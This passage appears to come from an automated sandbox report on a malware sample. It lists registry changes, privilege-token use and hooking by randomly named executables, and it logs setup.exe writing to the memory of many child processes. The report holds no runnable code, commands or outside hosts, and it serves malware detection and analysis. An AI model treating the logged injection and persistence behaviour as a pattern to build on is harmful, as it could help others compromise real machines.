Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	N0ycQ3j_C9A6WtSTJQw2tiLl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket	cJDPFsk.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	9QiHXYjbvykQRsyWHraOQHU3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\TypeLib\{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}\1.0\FLAGS\ = "0"	OneDrive.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\ProxyStubClsid32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\TypeLib\{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}\1.0\ = "FileSyncLibrary 1.0 Type Library"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{53de12aa-df96-413d-a25e-c75b6528abf2}	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\TypeLib\{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}\1.0\HELPDIR	OneDrive.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\TypeLib\{082D3FEC-D0D0-4DF6-A988-053FECE7B884}\1.0\HELPDIR	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib\Version = "1.0"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\TypeLib\{C9F3F6BB-3172-4CD8-9EB7-37C9BE601C87}\1.0\HELPDIR	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{6bb93b4e-44d8-40e2-bd97-42dbcf18a40f}\LocalServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Interface\{2387C6BD-9A36-41A2-88ED-FF731E529384}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\amd64\\FileSyncShell64.dll"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\ = "ISyncEngineHoldFile"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\SyncEngineStorageProviderHandlerProxy.SyncEngineStorageProviderHandlerProxy\CLSID\ = "{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\TypeLib	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Interface\{f0440f4e-4884-4a8F-8a45-ba89c00f96f2}\ = "IUnmapLibraryCallback"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{6bb93b4e-44d8-40e2-bd97-42dbcf18a40f}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /cci"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\SyncEngineStorageProviderHandlerProxy.SyncEngineStorageProviderHandlerProxy.1\ = "SyncEngineStorageProviderHandlerProxy Class"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\TypeLib	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\SyncEngineFileInfoProvider.SyncEngineFileInfoProvider\ = "SyncEngineFileInfoProvider Class"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\ = "SyncingOverlayHandler2 Class"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\TypeLib	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\odopen\shell\open	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\TypeLib	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\ProgID\ = "SyncEngineCOMServer.SyncEngineCOMServer.1"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\ = "ISyncItemPathCallback"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\ProxyStubClsid32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\ = "IContextMenuHandler"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\VersionIndependentProgID	OneDrive.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\3\NodeSlot = "12"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\ProxyStubClsid32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\ = "IIsMappingValidCallback"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\ProxyStubClsid32	OneDrive.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\SyncEngineStorageProviderHandlerProxy.SyncEngineStorageProviderHandlerProxy	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\ = "IDeviceHeroShotCallback"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\ProxyStubClsid32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\ProxyStubClsid32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\WOW6432Node\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDrive.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3740	PING.EXE

Suspicious behavior: AddClipboardFormatListener 5 IoCs

pid	Process
3516	Process not Found
5568	OneDrive.exe
3516	Process not Found
3516	Process not Found
3516	Process not Found

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4164	setup.exe
4164	setup.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

pid	Process
2304	7zFM.exe
1420	taskmgr.exe
3516	Process not Found
3632	taskmgr.exe
3544	taskmgr.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
660	Process not Found

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
5268	JynMWOEPU4IgIbVkKO84zcFB.exe
2264	v0xDTuqvEPa9a6ZvVWNtlOgW.exe
5396	htcrjfd
4544	hccrjfd

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	4556	7zFM.exe
Token: 35	4556	7zFM.exe
Token: SeManageVolumePrivilege	5036	svchost.exe
Token: SeRestorePrivilege	952	7zFM.exe
Token: 35	952	7zFM.exe
Token: SeRestorePrivilege	3100	7zFM.exe
Token: 35	3100	7zFM.exe
Token: SeRestorePrivilege	2200	7zFM.exe
Token: 35	2200	7zFM.exe
Token: SeRestorePrivilege	4540	7zFM.exe
Token: 35	4540	7zFM.exe
Token: SeRestorePrivilege	2304	7zFM.exe
Token: 35	2304	7zFM.exe
Token: SeSecurityPrivilege	2304	7zFM.exe
Token: SeSecurityPrivilege	2304	7zFM.exe
Token: SeDebugPrivilege	1420	taskmgr.exe
Token: SeSystemProfilePrivilege	1420	taskmgr.exe
Token: SeCreateGlobalPrivilege	1420	taskmgr.exe
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeDebugPrivilege	1860	RegAsm.exe
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeDebugPrivilege	944	powershell.exe
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeDebugPrivilege	5800	powershell.exe
Token: SeDebugPrivilege	2888	powershell.exe
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found
Token: SeShutdownPrivilege	3516	Process not Found
Token: SeCreatePagefilePrivilege	3516	Process not Found

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4556	7zFM.exe
952	7zFM.exe
3100	7zFM.exe
2200	7zFM.exe
4540	7zFM.exe
2304	7zFM.exe
2304	7zFM.exe
2304	7zFM.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe
1420	taskmgr.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
4164	setup.exe
4248	setup.exe
548	setup.exe
2248	N0ycQ3j_C9A6WtSTJQw2tiLl.exe
2264	v0xDTuqvEPa9a6ZvVWNtlOgW.exe
5196	GOGiZZ7TyIhDAlIeP5sfGlZO.exe
2076	OBLAwvm9ivOuzAxhr7WPxFVM.exe
5268	JynMWOEPU4IgIbVkKO84zcFB.exe
5288	YS5WX7w7h1C8FiujhDjhoYut.exe
5312	1oZdRn6Lg7UjbbxQsKZU0axb.exe
5324	UzKIBfmjFNozZXyrAyTGxD4s.exe
5360	R73AhOT__GA6HZOWmJT_6PE6.exe
5368	08Pe92t38IhUjdjelmkTU5Aq.exe
5380	9QiHXYjbvykQRsyWHraOQHU3.exe
5740	UzKIBfmjFNozZXyrAyTGxD4s.tmp
5792	OlHIbQCQzMDwcktuUDGh8kb_.exe
5720	4Bt0hCDPbeDogzYRepH92ntN.exe
4444	pwZ35FqiU3OeBSS0JTof8T37.exe
4132	cruisemailer.exe
3136	Install.exe
2336	4Bt0hCDPbeDogzYRepH92ntN.exe
2572	cruisemailer.exe
3176	Install.exe
1860	RegAsm.exe
4824	RegAsm.exe
3476	wfplwfs.exe
5344	2.3.1.1.exe
5000	rundll32.exe
5000	rundll32.exe
5000	rundll32.exe
5932	MsBuild.exe
5816	rundll32.exe
5816	rundll32.exe
5816	rundll32.exe
5376	rundll32.exe
5376	rundll32.exe
5376	rundll32.exe
1776	rundll32.exe
1776	rundll32.exe
1776	rundll32.exe
6128	rundll32.exe
6128	rundll32.exe
6128	rundll32.exe
3516	Process not Found
3516	Process not Found
524	rundll32.exe
524	rundll32.exe
524	rundll32.exe
3516	Process not Found
3516	Process not Found
3516	Process not Found
3516	Process not Found
3516	Process not Found
3516	Process not Found
5588	rundll32.exe
5588	rundll32.exe
5588	rundll32.exe
3456	rundll32.exe
3456	rundll32.exe
3456	rundll32.exe
3516	Process not Found
3516	Process not Found
4292	rundll32.exe
4292	rundll32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3260 wrote to memory of 4556	3260	cmd.exe	89
PID 3260 wrote to memory of 4556	3260	cmd.exe	89
PID 4164 wrote to memory of 2264	4164	setup.exe	243
PID 4164 wrote to memory of 2264	4164	setup.exe	243
PID 4164 wrote to memory of 2264	4164	setup.exe	243
PID 4164 wrote to memory of 2248	4164	setup.exe	148
PID 4164 wrote to memory of 2248	4164	setup.exe	148
PID 4164 wrote to memory of 2248	4164	setup.exe	148
PID 4164 wrote to memory of 2076	4164	setup.exe	150
PID 4164 wrote to memory of 2076	4164	setup.exe	150
PID 4164 wrote to memory of 2076	4164	setup.exe	150
PID 4164 wrote to memory of 5196	4164	setup.exe	151
PID 4164 wrote to memory of 5196	4164	setup.exe	151
PID 4164 wrote to memory of 5196	4164	setup.exe	151
PID 4164 wrote to memory of 5216	4164	setup.exe	152
PID 4164 wrote to memory of 5216	4164	setup.exe	152
PID 4164 wrote to memory of 5216	4164	setup.exe	152
PID 4164 wrote to memory of 5268	4164	setup.exe	153
PID 4164 wrote to memory of 5268	4164	setup.exe	153
PID 4164 wrote to memory of 5268	4164	setup.exe	153
PID 4164 wrote to memory of 5288	4164	setup.exe	155
PID 4164 wrote to memory of 5288	4164	setup.exe	155
PID 4164 wrote to memory of 5288	4164	setup.exe	155
PID 4164 wrote to memory of 5280	4164	setup.exe	154
PID 4164 wrote to memory of 5280	4164	setup.exe	154
PID 4164 wrote to memory of 5312	4164	setup.exe	361
PID 4164 wrote to memory of 5312	4164	setup.exe	361
PID 4164 wrote to memory of 5312	4164	setup.exe	361
PID 4164 wrote to memory of 5324	4164	setup.exe	157
PID 4164 wrote to memory of 5324	4164	setup.exe	157
PID 4164 wrote to memory of 5324	4164	setup.exe	157
PID 4164 wrote to memory of 5360	4164	setup.exe	158
PID 4164 wrote to memory of 5360	4164	setup.exe	158
PID 4164 wrote to memory of 5360	4164	setup.exe	158
PID 4164 wrote to memory of 5368	4164	setup.exe	159
PID 4164 wrote to memory of 5368	4164	setup.exe	159
PID 4164 wrote to memory of 5368	4164	setup.exe	159
PID 4164 wrote to memory of 5380	4164	setup.exe	160
PID 4164 wrote to memory of 5380	4164	setup.exe	160
PID 4164 wrote to memory of 5380	4164	setup.exe	160
